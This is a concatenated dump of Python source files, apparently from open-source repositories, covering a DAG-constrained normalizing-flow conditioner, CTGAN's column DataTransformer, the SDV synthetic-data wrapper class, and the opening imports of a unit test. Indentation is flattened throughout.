class DAGMLP(nn.Module):
def __init__(self, in_size, hidden, out_size, cond_in=0):
super(DAGMLP, self).__init__()
in_size = in_size
l1 = [in_size + cond_in] + hidden
l2 = hidden + [out_size]
layers = []
for h1, h2 in zip(l1, l2):
layers += [nn.Linear(h1, h2), nn.ReLU()]
layers.pop()
self.net = nn.Sequential(*layers)
def forward(self, x, context=None):
if context is not None:
x = torch.cat((x, context), 1)
return self.net(x)
class DAGConditioner(Conditioner):
def __init__(self, in_size, hidden, out_size, cond_in=0, soft_thresholding=True, h_thresh=0., gumble_T=1.,
hot_encoding=False, l1=0., nb_epoch_update=1, A_prior=None):
super(DAGConditioner, self).__init__()
if A_prior is None:
self.A = nn.Parameter(torch.ones(in_size, in_size) * 2. + torch.randn((in_size, in_size)) * .1)
else:
self.A = nn.Parameter(A_prior)
self.in_size = in_size
self.exponent = self.in_size % 50
self.s_thresh = soft_thresholding
self.h_thresh = h_thresh
self.stoch_gate = True
self.noise_gate = False
in_net = in_size * 2 if hot_encoding else in_size
if issubclass(type(hidden), nn.Module):
self.embedding_net = hidden
else:
self.embedding_net = DAGMLP(in_net, hidden, out_size, cond_in)
self.gumble = True
self.hutchinson = False
self.gumble_T = gumble_T
self.hot_encoding = hot_encoding
with torch.no_grad():
self.constrainA(h_thresh)
# Buffers related to the optimization of the constraints on A
self.register_buffer("c", torch.tensor(1e-3))
self.register_buffer("eta", torch.tensor(10.))
self.register_buffer("gamma", torch.tensor(.9))
self.register_buffer("lambd", torch.tensor(.0))
self.register_buffer("l1_weight", torch.tensor(l1))
self.register_buffer("dag_const", torch.tensor(1.))
self.alpha_factor = 1.
self.d = in_size
self.tol = 1e-10
self.register_buffer("alpha", self.getAlpha())
self.register_buffer("prev_trace", self.get_power_trace())
self.nb_epoch_update = nb_epoch_update
self.no_update = 0
self.is_invertible = False
self.register_buffer("buff_dagness", torch.zeros(10))
def getAlpha(self):
alpha = torch.tensor(1./self.in_size)
return alpha
def get_dag(self):
return self
def post_process(self, zero_threshold=None):
if zero_threshold is None:
zero_threshold = .1
G = nx.from_numpy_matrix((self.soft_thresholded_A().data.clone().abs() > zero_threshold).float().detach().cpu().numpy(), create_using=nx.DiGraph)
while not nx.is_directed_acyclic_graph(G):
zero_threshold += .05
G = nx.from_numpy_matrix(
(self.soft_thresholded_A().data.clone().abs() > zero_threshold).float().detach().cpu().numpy(),
create_using=nx.DiGraph)
self.stoch_gate = False
self.noise_gate = False
self.s_thresh = False
self.h_thresh = 0.
self.A.data = (self.soft_thresholded_A().data.clone().abs() > zero_threshold).float()
self.A *= 1. - torch.eye(self.in_size, device=self.A.device)
self.A.requires_grad = False
self.A.grad = None
self.is_invertible = True
def stochastic_gate(self, importance):
if self.gumble:
# Gumbel soft-max gate
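# Binary Gumbel-softmax (Concrete) relaxation of a Bernoulli gate with probability `importance`:
# with g1, g2 ~ Gumbel(0, 1), the returned value z1 / (z1 + z2) is a differentiable sample in (0, 1)
# that concentrates on {0, 1} as the temperature `temp` goes to 0.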
temp = self.gumble_T
epsilon = 1e-6
g1 = -torch.log(-torch.log(torch.rand(importance.shape, device=self.A.device)))
g2 = -torch.log(-torch.log(torch.rand(importance.shape, device=self.A.device)))
z1 = torch.exp((torch.log(importance + epsilon) + g1)/temp)
z2 = torch.exp((torch.log(1 - importance + epsilon) + g2)/temp)
return z1 / (z1 + z2)
else:
beta_1, beta_2 = 3., 10.
sigma = beta_1/(1. + beta_2*torch.sqrt((importance - .5)**2.))
mu = importance
z = torch.randn(importance.shape, device=self.A.device) * sigma + mu + .25
return torch.relu(z.clamp_max(1.))
def noiser_gate(self, x, importance):
noise = torch.randn(importance.shape, device=self.A.device) * torch.sqrt((1 - importance)**2)
return importance*(x + noise)
def soft_thresholded_A(self):
return 2*(torch.sigmoid(2*(self.A**2)) -.5)
def hard_thresholded_A(self):
if self.s_thresh:
return self.soft_thresholded_A()*(self.soft_thresholded_A() > self.h_thresh).float()
return self.A**2 * (self.A**2 > self.h_thresh).float()
def forward(self, x, context=None):
b_size = x.shape[0]
if self.h_thresh > 0:
if self.stoch_gate:
e = (x.unsqueeze(1).expand(-1, self.in_size, -1) * self.stochastic_gate(self.hard_thresholded_A().unsqueeze(0)
.expand(x.shape[0], -1, -1)))\
.view(x.shape[0] * self.in_size, -1)
elif self.noise_gate:
e = self.noiser_gate(x.unsqueeze(1).expand(-1, self.in_size, -1),
self.hard_thresholded_A().unsqueeze(0)
.expand(x.shape[0], -1, -1))\
.view(x.shape[0] * self.in_size, -1)
else:
e = (x.unsqueeze(1).expand(-1, self.in_size, -1) * self.hard_thresholded_A().unsqueeze(0)
.expand(x.shape[0], -1, -1)).view(x.shape[0] * self.in_size, -1)
elif self.s_thresh:
if self.stoch_gate:
e = (x.unsqueeze(1).expand(-1, self.in_size, -1) * self.stochastic_gate(self.soft_thresholded_A().unsqueeze(0)
.expand(x.shape[0], -1, -1))).view(x.shape[0] * self.in_size, -1)
elif self.noise_gate:
e = self.noiser_gate(x.unsqueeze(1).expand(-1, self.in_size, -1),
self.soft_thresholded_A().unsqueeze(0).expand(x.shape[0], -1, -1))\
.view(x.shape[0] * self.in_size, -1)
else:
e = (x.unsqueeze(1).expand(-1, self.in_size, -1) * self.soft_thresholded_A().unsqueeze(0)
.expand(x.shape[0], -1, -1)).view(x.shape[0] * self.in_size, -1)
else:
e = (x.unsqueeze(1).expand(-1, self.in_size, -1) * self.A.unsqueeze(0).expand(x.shape[0], -1, -1))\
.view(x.shape[0] * self.in_size, -1)
if self.hot_encoding:
hot_encoding = torch.eye(self.in_size, device=self.A.device).unsqueeze(0).expand(x.shape[0], -1, -1)\
.contiguous().view(-1, self.in_size)
# # TODO CLEAN CODE FOR the positional encoding.
# width = int(self.in_size**.5)
# indices = torch.arange(width, device=self.A.device).unsqueeze(0).expand(width, -1).contiguous()
# mesh = torch.cat((indices.view(-1, 1), indices.T.contiguous().view(-1, 1)), 1).float()/width
# pos_encoding = mesh.unsqueeze(0).expand(x.shape[0], -1, -1).contiguous().view(-1, 2)
if context is not None:
context = context.unsqueeze(1).expand(-1, self.in_size, -1).reshape(b_size*self.in_size, -1)
e = self.embedding_net(torch.cat((e, hot_encoding), 1), context)#.view(x.shape[0], self.in_size, -1)
full_e = torch.cat((e, hot_encoding), 1).view(x.shape[0], self.in_size, -1)
#full_e = torch.cat((e, pos_encoding), 1).view(x.shape[0], self.in_size, -1)
# TODO Add context
return full_e
return self.embedding_net(e).view(x.shape[0], self.in_size, -1)#.permute(0, 2, 1).contiguous().view(x.shape[0], -1)
def constrainA(self, zero_threshold=.0001):
self.A *= (self.A.clone().abs() > zero_threshold).float()
self.A *= 1. - torch.eye(self.in_size, device=self.A.device)
return
def get_power_trace(self):
alpha = min(1., self.alpha)
alpha *= self.alpha_factor
if self.hutchinson != 0:
h_iter = self.hutchinson
trace = 0.
I = torch.eye(self.in_size, device=self.A.device)
for j in range(h_iter):
e0 = torch.randn(self.in_size, 1).to(self.A.device)
e = e0
for i in range(self.in_size):
e = (I + alpha * self.A ** 2) @ e
trace += (e0 * e).sum()
return trace / h_iter - self.in_size
B = (torch.eye(self.in_size, device=self.A.device) + alpha * self.A ** 2)
M = torch.matrix_power(B, self.exponent)
return torch.diag(M).sum() - self.in_size
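    # The quantity above is the DAG-GNN-style acyclicity measure h(A) = tr[(I + alpha*A*A)^k] - d
    # (with A*A taken elementwise), which reaches zero exactly when the squared adjacency matrix
    # encodes a DAG once the exponent k grows to d; the Hutchinson branch only estimates that trace
    # stochastically. update_dual_param() below runs the augmented-Lagrangian dual update on this
    # constraint and, once it is numerically satisfied, post-processes A into a hard acyclic mask.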
def update_dual_param(self):
with torch.no_grad():
lag_const = self.get_power_trace()
while self.dag_const > 0. and lag_const < self.tol and self.exponent < self.in_size:
print("Update exponent", self.exponent)
if self.in_size > 50:
self.exponent += 50
else:
self.exponent = self.in_size
lag_const = self.get_power_trace()
if self.dag_const > 0. and lag_const > self.tol:
self.lambd = self.lambd + self.c * lag_const
                # Taking the absolute value does not really make sense here (kept as in DAG-GNN)
if lag_const.abs() > self.gamma*self.prev_trace.abs():
self.c *= self.eta
self.prev_trace = lag_const
elif self.dag_const > 0.:
print("DAGness is very low: %f -> Post processing" % torch.log(lag_const), flush=True)
A_before = self.A.clone()
self.post_process()
self.alpha = torch.tensor(self.getAlpha())
lag_const = self.get_power_trace()
print("DAGness is now: %f" % torch.log(lag_const), flush=True)
if lag_const > 0.:
print("Error in post-processing.", flush=True)
self.stoch_gate = True
self.noise_gate = False
self.s_thresh = True
self.h_thresh = 0.
self.A = nn.Parameter(A_before)
self.A.requires_grad = True
self.A.grad = self.A.clone()
self.alpha = torch.tensor(self.getAlpha())
self.prev_trace = self.get_power_trace()
self.c *= 1/self.eta
self.lambd = self.lambd + self.c * lag_const
self.dag_const = torch.tensor(1.)
else:
self.dag_const = torch.tensor(0., device=self.A.device)
self.l1_weight = torch.tensor(0., device=self.A.device)
print("Post processing successful.")
print("Number of edges is %d VS number max is %d" %
(int(self.A.sum().item()), ((self.d - 1)*self.d)/2), flush=True)
else:
G = nx.from_numpy_matrix(self.A.detach().cpu().numpy() ** 2, create_using=nx.DiGraph)
try:
nx.find_cycle(G)
print("Bad news there is still cycles in this graph.", flush=True)
self.A.requires_grad = True
self.A.grad = self.A.clone()
self.stoch_gate = True
self.noise_gate = False
self.s_thresh = True
self.h_thresh = 0.
self.alpha = self.getAlpha()
self.prev_trace = self.get_power_trace()
self.dag_const = torch.tensor(1.)
print(self.in_size, self.prev_trace)
except nx.NetworkXNoCycle:
print("Good news there is no cycle in this graph.", flush=True)
print("Depth of the graph is: %d" % self.depth())
self.is_invertible = True#torch.tensor(True)
print("DAGness is still very low: %f" % torch.log(self.get_power_trace()), flush=True)
return lag_const
def depth(self):
G = nx.from_numpy_matrix(self.A.detach().cpu().numpy() ** 2, create_using=nx.DiGraph)
if self.is_invertible or nx.is_directed_acyclic_graph(G):
return int(nx.dag_longest_path_length(G))
return 0
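    # loss() below contributes the augmented-Lagrangian terms to the training objective:
    # lambda * h(A) + (c/2) * h(A)^2, plus an L1 penalty on A, where h(A) is the
    # power-trace acyclicity measure computed by get_power_trace().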
def loss(self):
lag_const = self.get_power_trace()
loss = self.dag_const*(self.lambd*lag_const + self.c/2*lag_const**2) + self.l1_weight*self.A.abs().mean()
return loss
def step(self, epoch_number, loss_avg=0.):
with torch.no_grad():
lag_const = self.get_power_trace()
if lag_const > 1000:
self.exponent -= 5
self.exponent = self.exponent if self.exponent > 3 else 3
if epoch_number % self.nb_epoch_update == 0 and epoch_number > 0:
if self.loss().abs() < torch.tensor(loss_avg).abs() / 2 or self.no_update > 10:
print("Update param", flush=True)
self.update_dual_param()
self.no_update = 0
else:
print("No Update param", flush=True)
self.no_update += 1
```
#### File: models/Step/NormalizingFlow.py
```python
import torch
import torch.nn as nn
from models.Conditionners import Conditioner, DAGConditioner
from models.Normalizers import Normalizer
from models.Utils.Distributions import FlowDensity
class NormalizingFlow(nn.Module):
def __init__(self):
super(NormalizingFlow, self).__init__()
'''
Should return the x transformed and the log determinant of the Jacobian of the transformation
'''
def forward(self, x, context=None):
pass
'''
Should return a term relative to the loss.
'''
def constraintsLoss(self):
pass
'''
Should return the dagness of the associated graph.
'''
def DAGness(self):
pass
'''
    Step in the optimization procedure.
'''
def step(self, epoch_number, loss_avg):
pass
'''
Return a list containing the conditioners.
'''
def getConditioners(self):
pass
'''
Return True if the architecture is invertible.
'''
def isInvertible(self):
pass
'''
Return a list containing the normalizers.
'''
def getNormalizers(self):
pass
'''
Return the x that would generate z: [B, d] tensor.
'''
def invert(self, z, context=None):
pass
class NormalizingFlowStep(NormalizingFlow):
def __init__(self, conditioner: Conditioner, normalizer: Normalizer):
super(NormalizingFlowStep, self).__init__()
self.conditioner = conditioner
self.normalizer = normalizer
def forward(self, x, context=None):
h = self.conditioner(x, context)
z, jac = self.normalizer(x, h, context)
return z, torch.log(jac).sum(1)
def constraintsLoss(self):
if issubclass(type(self.conditioner), DAGConditioner):
return self.conditioner.loss()
return 0.
def DAGness(self):
if issubclass(type(self.conditioner), DAGConditioner):
return [self.conditioner.get_power_trace()]
return [0.]
def step(self, epoch_number, loss_avg):
if issubclass(type(self.conditioner), DAGConditioner):
self.conditioner.step(epoch_number, loss_avg)
def getConditioners(self):
return [self.conditioner]
def getNormalizers(self):
return [self.normalizer]
def isInvertible(self):
for conditioner in self.getConditioners():
if not conditioner.is_invertible:
return False
return True
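    # Inversion below works by fixed-point iteration: with an acyclic conditioner each pass fixes the
    # variables whose parents are already correct, so at most conditioner.depth() + 1 passes are
    # needed; the loop exits early once x stops changing.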
def invert(self, z, context=None):
x = torch.zeros_like(z)
for i in range(self.conditioner.depth() + 1):
h = self.conditioner(x, context)
x_prev = x
x = self.normalizer.inverse_transform(z, h, context)
if torch.norm(x - x_prev) == 0.:
break
return x
class FCNormalizingFlow(NormalizingFlow):
def __init__(self, steps: NormalizingFlow, z_log_density: FlowDensity):
super(FCNormalizingFlow, self).__init__()
self.steps = nn.ModuleList()
self.z_log_density = z_log_density
for step in steps:
self.steps.append(step)
def forward(self, x, context=None):
jac_tot = 0.
inv_idx = torch.arange(x.shape[1] - 1, -1, -1).long()
for step in self.steps:
z, jac = step(x, context)
x = z[:, inv_idx]
jac_tot += jac
return z, jac_tot
def constraintsLoss(self):
loss = 0.
for step in self.steps:
loss += step.constraintsLoss()
return loss
def DAGness(self):
dagness = []
for step in self.steps:
dagness += step.DAGness()
return dagness
def step(self, epoch_number, loss_avg):
for step in self.steps:
step.step(epoch_number, loss_avg)
def loss(self, z, jac):
log_p_x = jac + self.z_log_density(z)
return self.constraintsLoss() - log_p_x.mean()
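    # compute_ll() below returns the exact log-likelihood under the flow,
    # log p(x) = log p_Z(z) + log|det J|, with the total log-Jacobian accumulated
    # over the steps in forward().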
def compute_ll(self, x, context=None):
z, jac_tot = self(x, context)
log_p_x = jac_tot + self.z_log_density(z)
return log_p_x, z
def getNormalizers(self):
normalizers = []
for step in self.steps:
normalizers += step.getNormalizers()
return normalizers
def getConditioners(self):
conditioners = []
for step in self.steps:
conditioners += step.getConditioners()
return conditioners
def isInvertible(self):
for conditioner in self.getConditioners():
if not conditioner.is_invertible:
return False
return True
def invert(self, z, context=None):
if type(z) is list:
z = self.z_log_density.sample(z)
inv_idx = torch.arange(z.shape[1] - 1, -1, -1).long()
for step in range(len(self.steps)):
x = self.steps[-step - 1].invert(z, context)
z = x[:, inv_idx]
return x
class CNNormalizingFlow(FCNormalizingFlow):
def __init__(self, steps, z_log_density, dropping_factors):
super(CNNormalizingFlow, self).__init__(steps, z_log_density)
self.dropping_factors = dropping_factors
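    # forward() below implements a multi-scale scheme: after each step the image is unfolded by the
    # step's dropping factors, one sub-tensor per patch is kept and passed to the next step, and the
    # remaining sub-tensors are emitted directly as latent dimensions (collected in z_all) -- similar
    # in spirit to multi-scale factor-out architectures such as RealNVP.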
def forward(self, x, context=None):
b_size = x.shape[0]
jac_tot = 0.
z_all = []
for step, drop_factors in zip(self.steps, self.dropping_factors):
z, jac = step(x, context)
d_c, d_h, d_w = drop_factors
C, H, W = step.img_sizes
c, h, w = int(C/d_c), int(H/d_h), int(W/d_w)
z_reshaped = z.view(-1, C, H, W).unfold(1, d_c, d_c).unfold(2, d_h, d_h) \
.unfold(3, d_w, d_w).contiguous().view(b_size, c, h, w, -1)
z_all += [z_reshaped[:, :, :, :, 1:].contiguous().view(b_size, -1)]
x = z.view(-1, C, H, W).unfold(1, d_c, d_c).unfold(2, d_h, d_h) \
.unfold(3, d_w, d_w).contiguous().view(b_size, c, h, w, -1)[:, :, :, :, 0] \
.contiguous().view(b_size, -1)
jac_tot += jac
z_all += [x]
z = torch.cat(z_all, 1)
return z, jac_tot
def invert(self, z, context=None):
b_size = z.shape[0]
z_all = []
i = 0
for step, drop_factors in zip(self.steps, self.dropping_factors):
d_c, d_h, d_w = drop_factors
C, H, W = step.img_sizes
c, h, w = int(C / d_c), int(H / d_h), int(W / d_w)
nb_z = C*H*W - c*h*w if C*H*W != c*h*w else c*h*w
z_all += [z[:, i:i+nb_z]]
i += nb_z
x = 0.
for i in range(1, len(self.steps) + 1):
step = self.steps[-i]
drop_factors = self.dropping_factors[-i]
d_c, d_h, d_w = drop_factors
C, H, W = step.img_sizes
c, h, w = int(C / d_c), int(H / d_h), int(W / d_w)
z = z_all[-i]
if c*h*w != C*H*W:
z = z.view(b_size, c, h, w, -1)
x = x.view(b_size, c, h, w, 1)
z = torch.cat((x, z), 4)
z = z.view(b_size, c, h, w, d_c, d_h, d_w)
z = z.permute(0, 1, 2, 3, 6, 4, 5).contiguous().view(b_size, c, h, W, d_c, d_h)
z = z.permute(0, 1, 2, 5, 3, 4).contiguous().view(b_size, c, H, W, d_c)
z = z.permute(0, 1, 4, 2, 3).contiguous().view(b_size, C, H, W)
x = step.invert(z.view(b_size, -1), context)
return x
class FixedScalingStep(NormalizingFlow):
def __init__(self, mu, std):
super(FixedScalingStep, self).__init__()
self.mu = mu
self.std = std
def forward(self, x, context=None):
z = (x - self.mu.unsqueeze(0).expand(x.shape[0], -1))/self.std.unsqueeze(0).expand(x.shape[0], -1)
jac = self.std.unsqueeze(0).expand(x.shape[0], -1)
return z, -torch.log(jac).sum(1)
def constraintsLoss(self):
return 0.
def DAGness(self):
return [0.]
def step(self, epoch_number, loss_avg):
return
def getConditioners(self):
return []
def getNormalizers(self):
return []
def isInvertible(self):
return True
def invert(self, z, context=None):
x = z * self.std.unsqueeze(0).expand(z.shape[0], -1) + self.mu.unsqueeze(0).expand(z.shape[0], -1)
return x
```
#### File: models/Utils/Distributions.py
```python
import torch.distributions as D
import torch
from math import pi
import torch.nn as nn
class FlowDensity(nn.Module):
def __init__(self):
super(FlowDensity, self).__init__()
def forward(self, z):
pass
def sample(self, shape):
pass
class NormalLogDensity(nn.Module):
def __init__(self):
super(NormalLogDensity, self).__init__()
self.register_buffer("pi", torch.tensor(pi))
def forward(self, z):
return torch.distributions.Normal(loc=0., scale=1.).log_prob(z).sum(1)
def sample(self, shape):
return torch.randn(shape)
class MixtureLogDensity(nn.Module):
def __init__(self, n_mode=10):
super(MixtureLogDensity, self).__init__()
self.register_buffer("pi", torch.tensor(pi))
self.register_buffer("mu", torch.arange(-3., 3.0001, 6. / float(n_mode - 1)))
self.register_buffer("sigma", torch.ones(n_mode, ) * 1.5 / float(n_mode))
self.register_buffer("mix_weights", torch.ones(n_mode, ))
def forward(self, z):
mix = D.Categorical(self.mix_weights)
comp = D.Normal(self.mu, self.sigma)
dist = D.MixtureSameFamily(mix, comp)
return dist.log_prob(z).sum(1)
``` |
{
"source": "JonathanDZiegler/CTGAN",
"score": 3
} |
#### File: CTGAN/ctgan/data_transformer.py
```python
from collections import namedtuple
import numpy as np
import pandas as pd
from rdt.transformers import BayesGMMTransformer, OneHotEncodingTransformer
SpanInfo = namedtuple('SpanInfo', ['dim', 'activation_fn'])
ColumnTransformInfo = namedtuple(
'ColumnTransformInfo', [
'column_name', 'column_type', 'transform', 'output_info', 'output_dimensions'
]
)
class DataTransformer(object):
"""Data Transformer.
    Continuous columns are modeled with a Bayesian GMM and normalized into a scalar in [0, 1] plus a vector.
    Discrete columns are encoded using an RDT OneHotEncodingTransformer.
"""
def __init__(self, max_clusters=10, weight_threshold=0.005):
"""Create a data transformer.
Args:
max_clusters (int):
Maximum number of Gaussian distributions in Bayesian GMM.
weight_threshold (float):
Weight threshold for a Gaussian distribution to be kept.
"""
self._max_clusters = max_clusters
self._weight_threshold = weight_threshold
def _fit_continuous(self, data):
"""Train Bayesian GMM for continuous columns.
Args:
data (pd.DataFrame):
A dataframe containing a column.
Returns:
namedtuple:
A ``ColumnTransformInfo`` object.
"""
column_name = data.columns[0]
gm = BayesGMMTransformer()
gm.fit(data, [column_name])
num_components = sum(gm.valid_component_indicator)
return ColumnTransformInfo(
column_name=column_name, column_type='continuous', transform=gm,
output_info=[SpanInfo(1, 'tanh'), SpanInfo(num_components, 'softmax')],
output_dimensions=1 + num_components)
def _fit_discrete(self, data):
"""Fit one hot encoder for discrete column.
Args:
data (pd.DataFrame):
A dataframe containing a column.
Returns:
namedtuple:
A ``ColumnTransformInfo`` object.
"""
column_name = data.columns[0]
ohe = OneHotEncodingTransformer()
ohe.fit(data, [column_name])
num_categories = len(ohe.dummies)
return ColumnTransformInfo(
column_name=column_name, column_type='discrete', transform=ohe,
output_info=[SpanInfo(num_categories, 'softmax')],
output_dimensions=num_categories)
def fit(self, raw_data, discrete_columns=()):
"""Fit the ``DataTransformer``.
Fits a ``BayesGMMTransformer`` for continuous columns and a
``OneHotEncodingTransformer`` for discrete columns.
This step also counts the #columns in matrix data and span information.
"""
self.output_info_list = []
self.output_dimensions = 0
self.dataframe = True
if not isinstance(raw_data, pd.DataFrame):
self.dataframe = False
            # Workaround for RDT issue #328: fitting with numerical column names fails
discrete_columns = [str(column) for column in discrete_columns]
column_names = [str(num) for num in range(raw_data.shape[1])]
raw_data = pd.DataFrame(raw_data, columns=column_names)
self._column_raw_dtypes = raw_data.infer_objects().dtypes
self._column_transform_info_list = []
for column_name in raw_data.columns:
if column_name in discrete_columns:
column_transform_info = self._fit_discrete(raw_data[[column_name]])
else:
column_transform_info = self._fit_continuous(raw_data[[column_name]])
self.output_info_list.append(column_transform_info.output_info)
self.output_dimensions += column_transform_info.output_dimensions
self._column_transform_info_list.append(column_transform_info)
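    # Mode-specific normalization (as in CTGAN): _transform_continuous() below represents each
    # continuous value as a scalar (the '.normalized' output, paired with a tanh activation span)
    # plus a one-hot vector over the Gaussian mixture component it was assigned to
    # (the '.component' output).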
def _transform_continuous(self, column_transform_info, data):
column_name = data.columns[0]
data[column_name] = data[column_name].to_numpy().flatten()
gm = column_transform_info.transform
transformed = gm.transform(data, [column_name])
# Converts the transformed data to the appropriate output format.
# The first column (ending in '.normalized') stays the same,
        # but the label encoded column (ending in '.component') is one hot encoded.
output = np.zeros((len(transformed), column_transform_info.output_dimensions))
output[:, 0] = transformed[f'{column_name}.normalized'].to_numpy()
index = transformed[f'{column_name}.component'].to_numpy().astype(int)
output[np.arange(index.size), index + 1] = 1.0
return output
def _transform_discrete(self, column_transform_info, data):
ohe = column_transform_info.transform
return ohe.transform(data).to_numpy()
def transform(self, raw_data):
"""Take raw data and output a matrix data."""
if not isinstance(raw_data, pd.DataFrame):
column_names = [str(num) for num in range(raw_data.shape[1])]
raw_data = pd.DataFrame(raw_data, columns=column_names)
column_data_list = []
for column_transform_info in self._column_transform_info_list:
column_name = column_transform_info.column_name
data = raw_data[[column_name]]
if column_transform_info.column_type == 'continuous':
column_data_list.append(self._transform_continuous(column_transform_info, data))
else:
column_data_list.append(self._transform_discrete(column_transform_info, data))
return np.concatenate(column_data_list, axis=1).astype(float)
def _inverse_transform_continuous(self, column_transform_info, column_data, sigmas, st):
gm = column_transform_info.transform
data = pd.DataFrame(column_data[:, :2], columns=list(gm.get_output_types()))
data.iloc[:, 1] = np.argmax(column_data[:, 1:], axis=1)
if sigmas is not None:
selected_normalized_value = np.random.normal(data.iloc[:, 0], sigmas[st])
data.iloc[:, 0] = selected_normalized_value
return gm.reverse_transform(data, [column_transform_info.column_name])
def _inverse_transform_discrete(self, column_transform_info, column_data):
ohe = column_transform_info.transform
data = pd.DataFrame(column_data, columns=list(ohe.get_output_types()))
return ohe.reverse_transform(data)[column_transform_info.column_name]
def inverse_transform(self, data, sigmas=None):
"""Take matrix data and output raw data.
Output uses the same type as input to the transform function.
Either np array or pd dataframe.
"""
st = 0
recovered_column_data_list = []
column_names = []
for column_transform_info in self._column_transform_info_list:
dim = column_transform_info.output_dimensions
column_data = data[:, st:st + dim]
if column_transform_info.column_type == 'continuous':
recovered_column_data = self._inverse_transform_continuous(
column_transform_info, column_data, sigmas, st)
else:
recovered_column_data = self._inverse_transform_discrete(
column_transform_info, column_data)
recovered_column_data_list.append(recovered_column_data)
column_names.append(column_transform_info.column_name)
st += dim
recovered_data = np.column_stack(recovered_column_data_list)
recovered_data = (pd.DataFrame(recovered_data, columns=column_names)
.astype(self._column_raw_dtypes))
if not self.dataframe:
recovered_data = recovered_data.to_numpy()
return recovered_data
def convert_column_name_value_to_id(self, column_name, value):
"""Get the ids of the given `column_name`."""
discrete_counter = 0
column_id = 0
for column_transform_info in self._column_transform_info_list:
if column_transform_info.column_name == column_name:
break
if column_transform_info.column_type == 'discrete':
discrete_counter += 1
column_id += 1
else:
raise ValueError(f"The column_name `{column_name}` doesn't exist in the data.")
ohe = column_transform_info.transform
data = pd.DataFrame([value], columns=[column_transform_info.column_name])
one_hot = ohe.transform(data).to_numpy()[0]
if sum(one_hot) == 0:
raise ValueError(f"The value `{value}` doesn't exist in the column `{column_name}`.")
return {
'discrete_column_id': discrete_counter,
'column_id': column_id,
'value_id': np.argmax(one_hot)
}
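# Hedged usage sketch (the dataframe and column names are illustrative, not taken from this repo):
#     transformer = DataTransformer()
#     transformer.fit(df, discrete_columns=('gender',))
#     matrix = transformer.transform(df)              # float ndarray, width == transformer.output_dimensions
#     recovered = transformer.inverse_transform(matrix)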
``` |
{
"source": "JonathanDZiegler/SDV",
"score": 3
} |
#### File: SDV/sdv/sdv.py
```python
import pickle
import warnings
from sdv.errors import NotFittedError
from sdv.relational.hma import HMA1
from sdv.tabular.copulas import GaussianCopula
from sdv.utils import get_package_versions, throw_version_mismatch_warning
class SDV:
"""Automated generative modeling and sampling tool.
Allows the users to generate synthetic data after creating generative models for their data.
Args:
model (type):
Class of the model to use. Defaults to ``sdv.relational.HMA1``.
model_kwargs (dict):
Keyword arguments to pass to the model. If no ``model`` is given,
this defaults to using a ``GaussianCopula`` with ``gaussian`` distribution
and ``categorical_fuzzy`` categorical transformer.
"""
_model_instance = None
DEFAULT_MODEL = HMA1
DEFAULT_MODEL_KWARGS = {
'model': GaussianCopula,
'model_kwargs': {
'default_distribution': 'gaussian',
'categorical_transformer': 'categorical_fuzzy',
}
}
def __init__(self, model=None, model_kwargs=None):
if model is None:
model = model or self.DEFAULT_MODEL
if model_kwargs is None:
model_kwargs = self.DEFAULT_MODEL_KWARGS
self._model = model
self._model_kwargs = (model_kwargs or dict()).copy()
def fit(self, metadata, tables=None, root_path=None):
"""Fit this SDV instance to the dataset data.
Args:
metadata (dict, str or Metadata):
Metadata dict, path to the metadata JSON file or Metadata instance itself.
tables (dict):
Dictionary with the table names as key and ``pandas.DataFrame`` instances as
values. If ``None`` is given, the tables will be loaded from the paths
indicated in ``metadata``. Defaults to ``None``.
root_path (str or None):
Path to the dataset directory. If ``None`` and metadata is
a path, the metadata location is used. If ``None`` and
metadata is a dict, the current working directory is used.
"""
self._model_instance = self._model(metadata, root_path, **self._model_kwargs)
self._model_instance.fit(tables)
def sample(self, table_name=None, num_rows=None,
sample_children=True, reset_primary_keys=False):
"""Generate synthetic data for one table or the entire dataset.
If a ``table_name`` is given and ``sample_children`` is ``False``, a
``pandas.DataFrame`` with the values from the indicated table is returned.
Otherwise, if ``sample_children`` is ``True``, a dictionary containing both
the table and all its descendant tables is returned.
If no ``table_name`` is given, the entire dataset is sampled and returned
in a dictionary.
If ``num_rows`` is given, the root tables of the dataset will contain the
indicated number of rows. Otherwise, the number of rows will be the same
as in the original dataset. Number of rows in the child tables cannot be
controlled and always will depend on the values from the sampled parent
tables.
If ``reset_primary_keys`` is ``True``, the primary key generators will be
reset.
Args:
table_name (str):
Name of the table to sample from. If not passed, sample the entire
dataset.
num_rows (int):
Amount of rows to sample. If ``None``, sample the same number of rows
as there were in the original table.
sample_children (bool):
                Whether or not to sample child tables. Used only if ``table_name`` is
given. Defaults to ``True``.
reset_primary_keys (bool):
                Whether or not to reset the primary key generators. Defaults to ``False``.
Returns:
dict or pandas.DataFrame:
- Returns a ``dict`` when ``sample_children`` is ``True`` with the sampled table
and child tables.
- Returns a ``pandas.DataFrame`` when ``sample_children`` is ``False``.
Raises:
NotFittedError:
A ``NotFittedError`` is raised when the ``SDV`` instance has not been fitted yet.
"""
if self._model_instance is None:
raise NotFittedError('SDV instance has not been fitted')
return self._model_instance.sample(
table_name,
num_rows,
sample_children=sample_children,
reset_primary_keys=reset_primary_keys
)
def sample_all(self, num_rows=None, reset_primary_keys=False):
"""Sample the entire dataset.
        WARNING: This method is deprecated and will be removed in future releases. Please
use the ``sample`` method instead.
Args:
num_rows (int):
Number of rows to be sampled on the first parent tables. If ``None``,
sample the same number of rows as in the original tables.
reset_primary_keys (bool):
                Whether or not to reset the primary key generators. Defaults to ``False``.
Returns:
dict:
Tables sampled.
Raises:
NotFittedError:
A ``NotFittedError`` is raised when the ``SDV`` instance has not been fitted yet.
"""
warnings.warn('`sample_all` is deprecated and will be removed soon. Please use `sample`',
DeprecationWarning)
return self.sample(num_rows=num_rows, reset_primary_keys=reset_primary_keys)
def save(self, path):
"""Save this SDV instance to the given path using pickle.
Args:
path (str):
Path where the SDV instance will be serialized.
"""
self._package_versions = get_package_versions(getattr(self, '_model', None))
with open(path, 'wb') as output:
pickle.dump(self, output)
@classmethod
def load(cls, path):
"""Load a SDV instance from a given path.
Args:
path (str):
Path from which to load the SDV instance.
"""
with open(path, 'rb') as f:
model = pickle.load(f)
throw_version_mismatch_warning(getattr(model, '_package_versions', None))
return model
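# Hedged usage sketch (paths and table names are illustrative only):
#     sdv = SDV()                                      # defaults to HMA1 with a GaussianCopula table model
#     sdv.fit(metadata, tables)                        # metadata dict/path/Metadata plus a dict of DataFrames
#     sampled = sdv.sample()                           # synthetic data for the whole dataset
#     users = sdv.sample('users', num_rows=10, sample_children=False)
#     sdv.save('model.pkl'); restored = SDV.load('model.pkl')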
```
#### File: unit/lite/test_tabular.py
```python
import io
from unittest.mock import Mock, patch
import numpy as np
import pandas as pd
import pytest
